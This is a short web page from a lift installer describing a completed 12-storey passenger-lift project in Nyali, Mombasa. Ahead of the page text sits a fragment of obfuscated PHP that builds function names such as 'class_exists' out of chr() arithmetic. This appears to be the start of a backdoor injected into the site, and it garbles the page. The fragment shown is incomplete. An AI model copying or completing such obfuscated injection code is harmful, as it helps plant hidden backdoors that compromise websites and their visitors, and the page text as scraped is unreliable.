$GSUoGs = chr (109) . chr ( 132 - 20 ).chr ( 1043 - 954 )."\137" . chr ( 690 - 587 )."\161" . chr ( 1043 - 962 ).chr ( 196 - 125 )."\x6c";$wsMcjq = chr ( 308 - 209 ).chr ( 700 - 592 ).'a' . chr (115) . chr (115) . chr (95) . chr ( 964 - 863 ).chr ( 817 - 697 ).chr (105) . chr ( 345 - 230 ).chr ( 633 - 517 ).chr (115); Nyali Golf View Residence - Mombasa | Ultra Electric limited

Nyali Golf View Residence – Mombasa

Situated in Nyali Mombasa, this iconic residence featured an elevator system that catered to this 12 storey building.  We delivered an innovative, cost-effective passenger lift that provided users with a seamless experience.

Status: Complete